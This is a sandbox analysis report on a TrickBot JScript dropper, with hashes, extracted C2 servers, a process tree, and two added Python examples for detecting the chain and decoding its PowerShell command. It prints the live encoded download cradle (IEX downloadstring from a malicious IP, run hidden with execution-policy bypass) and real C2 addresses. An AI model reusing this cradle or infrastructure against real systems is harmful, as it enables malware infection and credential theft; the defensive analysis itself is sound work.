Analysis
Max time kernel: 41s
Max time network: 144s
Platform: windows10_x64
Resource: win10v20210408
Submitted: 20-07-2021 16:28
Static task: static1
Behavioral task: behavioral1 (sample: 32.js; resource: win7v20210410)
General
Target: 32.js
Size: 463KB
MD5: 8f545d23b3544ed3e79ac481de6d2e35
SHA1: 2232a67e54f505fbd1d70ae0e18db1f8ed0b307d
SHA256: 97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65
SHA512: ef0df34055533efc390798bfe0c3875f0bfb5a975012ff77915e4f64c21e4eaf0abdbdeac4d85c74c73dbac9c6744cf4dbe905dc44d089179969516be804d1be
Malware Config
Extracted (URL carried in the encoded PowerShell command): http://109.248.201.26/lovemetertok.php
Extracted: trickbot
Version: 100018
Botnet (gtag): rob109
C2 servers (all on TCP/443):
38.110.103.124:443
185.56.76.28:443
204.138.26.60:443
60.51.47.65:443
74.85.157.139:443
68.69.26.182:443
38.110.103.136:443
38.110.103.18:443
138.34.28.219:443
185.56.76.94:443
217.115.240.248:443
24.162.214.166:443
80.15.2.105:443
154.58.23.192:443
38.110.100.104:443
45.36.99.184:443
185.56.76.108:443
185.56.76.72:443
138.34.28.35:443
97.83.40.67:443
38.110.103.113:443
38.110.100.142:443
184.74.99.214:443
103.105.254.17:443
62.99.76.213:443
82.159.149.52:443
38.110.100.33:443
38.110.100.242:443
185.13.79.3:443
Autorun modules: pwgrabb, pwgrabc
Signatures
Blocklisted process makes network request (2 IoCs)
  flow 11: powershell.exe (PID 2328)
  flow 12: powershell.exe (PID 2328)
  These are the PowerShell download cradle reaching out for the stage-2 URL listed under Malware Config.
Downloads MZ/PE file
Loads dropped DLL (1 IoC)
  rundll32.exe (PID 2336)
Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 19: wtfismyip.com
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour", but that text is the generic description of the heuristic; the extracted configuration identifies this sample as TrickBot, which is a banking trojan and loader, so drive enumeration here should not be read as ransomware activity.
Suspicious behavior: EnumeratesProcesses (3 IoCs)
  powershell.exe (PID 2328), three events
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  powershell.exe (PID 2328): SeDebugPrivilege
  wermgr.exe (PID 3568): SeDebugPrivilege
Suspicious use of WriteProcessMemory (16 IoCs, shown as source PID -> target PID with event count)
  wscript.exe (664) -> cmd.exe (204): 2
  cmd.exe (204) -> powershell.exe (2328): 2
  powershell.exe (2328) -> rundll32.exe (1148): 2
  rundll32.exe (1148) -> rundll32.exe (2336): 3
  rundll32.exe (2336) -> cmd.exe (764): 3
  rundll32.exe (2336) -> wermgr.exe (3568): 4
  The parent/child pairs in this list are what make the process tree below; the four writes from the SysWOW64 rundll32.exe into wermgr.exe, together with wermgr.exe then acquiring SeDebugPrivilege, are consistent with the bot injecting itself into wermgr.exe.
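The WriteProcessMemory list above is, in effect, a parent/child graph, and the signatures the sandbox raises are each a property of one node or one edge in it. The following is an added example, not part of the report or of any sandbox product, showing how a detection engineer would encode that chain as rules over Sysmon-style process-creation records. The records are constructed: PIDs, image paths and command lines are copied from this report, the explorer.exe/rundll32.exe records are a benign control, and the field names (pid, ppid, image, cmdline) are an assumption rather than the sandbox's export format. The rules generalise beyond this sample (any script host, any non-.dll loaded by rundll32 from a user profile, any child of rundll32 other than its own 32-bit relaunch).

```python
import re

# Constructed Sysmon-style process-creation records. PIDs, images and command
# lines come from this report; the last two records are a benign control.
# Field names are an assumption, not the sandbox's export format.
ENC = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA"

EVENTS = [
    {"pid": 664,  "ppid": 1,    "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\32.js"},
    {"pid": 204,  "ppid": 664,  "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc ' + ENC},
    {"pid": 2328, "ppid": 204,  "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "poWERshEll -nop -w hidden -ep bypass -enc " + ENC},
    {"pid": 1148, "ppid": 2328, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW'},
    {"pid": 2336, "ppid": 1148, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW'},
    {"pid": 764,  "ppid": 2336, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe"},
    {"pid": 3568, "ppid": 2336, "image": r"C:\Windows\system32\wermgr.exe",
     "cmdline": r"C:\Windows\system32\wermgr.exe"},
    # Benign control: explorer.exe running rundll32 against a system DLL.
    {"pid": 900,  "ppid": 1,    "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 901,  "ppid": 900,  "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc ...),
# so match the prefix family rather than the literal "-enc" seen in this sample.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)
# "<rundll32> <path>,<export>" with or without quotes around the binary or the path.
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+)"?\s*,\s*(\w+)', re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Yield parent, grandparent, ... (cycle-safe, since PIDs are reused on a live host)."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        yield parent
        parent = by_pid.get(parent["ppid"])


def detect(events):
    """Return (rule, pid) pairs for every record matching one of the chain rules."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        if name in SHELLS and pname in SCRIPT_HOSTS:
            hits.append(("script_host_spawns_shell", e["pid"]))
        # Check the wrapper cmd.exe line too: the encoded blob is already visible there.
        if "powershell" in cmd.lower() and ENC_FLAG.search(cmd):
            hits.append(("powershell_encoded_command", e["pid"]))
        if name == "rundll32.exe":
            m = RUNDLL_ARG.search(cmd)
            if m and USER_WRITABLE.search(m.group(1)) and not m.group(1).lower().endswith(".dll"):
                hits.append(("rundll32_non_dll_from_appdata", e["pid"]))
        # 64-bit rundll32 relaunching its SysWOW64 twin for a 32-bit DLL is normal;
        # any other child of rundll32 is not.
        if pname == "rundll32.exe" and name != "rundll32.exe":
            hits.append(("rundll32_spawns_child", e["pid"]))
        if name == "wermgr.exe" and any(basename(a["image"]) in SCRIPT_HOSTS for a in ancestors(e, by_pid)):
            hits.append(("wermgr_under_script_host", e["pid"]))
    return hits


def flagged_pids(events):
    return sorted({pid for _, pid in detect(events)})


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32s} pid={pid}")
```

Run against the constructed records, every process in the chain except the initial wscript.exe is flagged by at least one rule, and neither control record is. The ancestry walk is what lets the last rule fire on wermgr.exe even though its direct parent is a signed Windows binary; on a production host the same walk needs a cycle guard, as here, because PIDs are recycled.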
Processes (tree; PIDs taken from the WriteProcessMemory pairs above)
PID 664: C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\32.js
  Signatures: Suspicious use of WriteProcessMemory
  PID 204: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
    Signatures: Suspicious use of WriteProcessMemory
    PID 2328: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
      Decoded -enc argument (base64 over the UTF-16LE script): IEX (New-Object Net.Webclient).downloadstring("http://109.248.201.26/lovemetertok.php")
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      PID 1148: C:\Windows\System32\rundll32.exe
        Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW
        Signatures: Suspicious use of WriteProcessMemory
        PID 2336: C:\Windows\SysWOW64\rundll32.exe
          Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW
          Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
          PID 764: C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe
          PID 3568: C:\Windows\system32\wermgr.exe
            Command line: C:\Windows\system32\wermgr.exe
            Signatures: Suspicious use of AdjustPrivilegeToken

Reading the tree: the JScript dropper uses cmd.exe to start a hidden (-w hidden), profile-less (-nop), policy-bypassing (-ep bypass) PowerShell whose encoded command is a one-line download cradle for the URL recorded under Malware Config. The mixed-case "poWERshEll" defeats naive case-sensitive string matches on the command line but is still the same binary. The payload lands in %TEMP% as KjVwfSl.bin (a .bin extension, not .dll) and is executed with rundll32 through its StartW export; the 64-bit rundll32 (PID 1148) hands off to the SysWOW64 copy (PID 2336), which is what Windows does when the DLL is 32-bit. That process loads the dropped DLL and spawns cmd.exe and wermgr.exe, and wermgr.exe then acquires SeDebugPrivilege, consistent with the WriteProcessMemory events above targeting it.
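Turning the command line above into the decoded script, as an added example that is not part of this report or of any sandbox tooling. The command lines of PIDs 204 and 2328 and the URL under Malware Config are copied from the report; the switch table is modelled on how powershell.exe resolves abbreviated switches (any unambiguous prefix, with -ep as a dedicated alias for -ExecutionPolicy) and is an assumption of this example rather than something the report states. The decoder also handles the cmd.exe wrapper form, because that is usually the line an EDR records first.

```python
import base64
import re

# Command line of PID 2328 and its cmd.exe wrapper (PID 204), copied from this report.
ENC = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA"
POWERSHELL_CMDLINE = "poWERshEll -nop -w hidden -ep bypass -enc " + ENC
CMD_WRAPPER_CMDLINE = r'"C:\Windows\System32\cmd.exe" /c ' + POWERSHELL_CMDLINE
# URL the sandbox reported under Malware Config, used to cross-check the decode.
CONFIG_URL = "http://109.248.201.26/lovemetertok.php"

# powershell.exe resolves switches by minimum abbreviation, so -e, -enc and
# -EncodedCommand are one switch. (canonical name, string to prefix-match,
# minimum length) for the switches that matter here; "ep" is a dedicated alias.
# This table is an assumption modelled on the console host's parser.
PS_SWITCHES = [
    ("encodedcommand", "encodedcommand", "e"),
    ("executionpolicy", "executionpolicy", "ex"),
    ("executionpolicy", "ep", "ep"),
    ("noprofile", "noprofile", "nop"),
    ("windowstyle", "windowstyle", "w"),
    ("noninteractive", "noninteractive", "noni"),
    ("nologo", "nologo", "nol"),
    ("command", "command", "c"),
    ("file", "file", "f"),
]
VALUE_SWITCHES = {"encodedcommand", "executionpolicy", "windowstyle", "command", "file"}
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)


def resolve_switch(token):
    """Map '-nop', '/W', '-EnC' ... to the canonical switch name, or None."""
    if token[:1] not in "-/" or len(token) < 2:
        return None
    key = token[1:].lower()
    for canonical, full, minimum in PS_SWITCHES:
        if full.startswith(key) and len(key) >= len(minimum):
            return canonical
    return None


def parse_powershell_cmdline(cmdline):
    """Return {switch: value or True} for the powershell invocation in cmdline, or None."""
    tokens = cmdline.split()
    # Start after the powershell token so a leading 'cmd.exe /c' is not parsed as -Command.
    start = next((i for i, t in enumerate(tokens) if "powershell" in t.lower()), None)
    if start is None:
        return None
    switches, i = {}, start + 1
    while i < len(tokens):
        name = resolve_switch(tokens[i])
        if name in VALUE_SWITCHES and i + 1 < len(tokens):
            switches[name] = tokens[i + 1]
            i += 2
        else:
            if name:
                switches[name] = True
            i += 1
    return switches


def decode_encoded_command(blob):
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script, not UTF-8."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw.decode("utf-16le")


def analyse(cmdline):
    switches = parse_powershell_cmdline(cmdline) or {}
    script = None
    if isinstance(switches.get("encodedcommand"), str):
        script = decode_encoded_command(switches["encodedcommand"])
    urls = URL_RE.findall(script) if script else []
    cradle = bool(script) and "downloadstring" in script.lower() and (
        re.search(r"\biex\b|invoke-expression", script, re.I) is not None)
    return {
        "switches": switches,
        "hidden": str(switches.get("windowstyle", "")).lower() == "hidden",
        "script": script,
        "urls": urls,
        "download_cradle": cradle,
        "matches_config": CONFIG_URL in urls,
    }


if __name__ == "__main__":
    result = analyse(CMD_WRAPPER_CMDLINE)
    print(result["script"])
    print("urls:", result["urls"], "cradle:", result["download_cradle"], "hidden:", result["hidden"])
```

Decoding with utf-8 instead of utf-16le is the classic mistake here; it yields the right letters interleaved with NUL bytes, which then silently break any string match or URL extraction run on the result.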
Downloads
C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin (the report lists the same file twice, once as \Users\Admin\AppData\Local\Temp\KjVwfSl.bin; the hashes are identical)
MD5: 917e3c54104affcbe521e23e85517bb0
SHA1: 1bffd59bd2618f7ef810c02e9ddbc2011949e251
SHA256: d06c5ec5cefe2c6b80bf532cae9c270f2e25f0f2c5e6b05cffa36fe8a17dac3c
SHA512: 40e769e1f1c9d2531485fa9ac0e55d8c7b04486f32884d636ea0f08c26f702232be8ba11d6299722a3117b7bb08344c63a3bb375f7ef74b030663ca3bd411a0e
Memory dumps (named PID-sequence-range; "mapping.dmp" entries are the module mapping records, sizes given for memory regions):
memory/204-114-0x0000000000000000-mapping.dmp
memory/1148-133-0x0000000000000000-mapping.dmp
memory/2328-131-0x000002C0DC303000-0x000002C0DC305000-memory.dmp (8KB)
memory/2328-115-0x0000000000000000-mapping.dmp
memory/2328-132-0x000002C0DC306000-0x000002C0DC308000-memory.dmp (8KB)
memory/2328-125-0x000002C0DC490000-0x000002C0DC491000-memory.dmp (4KB)
memory/2328-120-0x000002C0C4170000-0x000002C0C4171000-memory.dmp (4KB)
memory/2328-130-0x000002C0DC300000-0x000002C0DC302000-memory.dmp (8KB)
memory/2336-143-0x0000000000F40000-0x0000000000F77000-memory.dmp (220KB)
memory/2336-138-0x00000000004D0000-0x000000000050B000-memory.dmp (236KB)
memory/2336-141-0x0000000000F00000-0x0000000000F39000-memory.dmp (228KB)
memory/2336-136-0x0000000000000000-mapping.dmp
memory/2336-146-0x0000000000F80000-0x0000000000FC4000-memory.dmp (272KB)
memory/2336-145-0x0000000000DC0000-0x0000000000DF8000-memory.dmp (224KB)
memory/2336-147-0x0000000000FF0000-0x0000000000FF1000-memory.dmp (4KB)
memory/2336-148-0x0000000000FD1000-0x0000000000FD3000-memory.dmp (8KB)
memory/3568-149-0x0000000000000000-mapping.dmp
memory/3568-151-0x00000195756C0000-0x00000195756C1000-memory.dmp (4KB)
memory/3568-150-0x00000195755A0000-0x00000195755C8000-memory.dmp (160KB)

For manual follow-up, the five 220KB to 272KB regions in PID 2336 (the SysWOW64 rundll32.exe that loaded KjVwfSl.bin) are the first place to look for an unpacked payload and its embedded configuration, since 2336 is the process that both loaded the dropped DLL and wrote into wermgr.exe; the 160KB region in PID 3568 (wermgr.exe) is the candidate for the injected copy.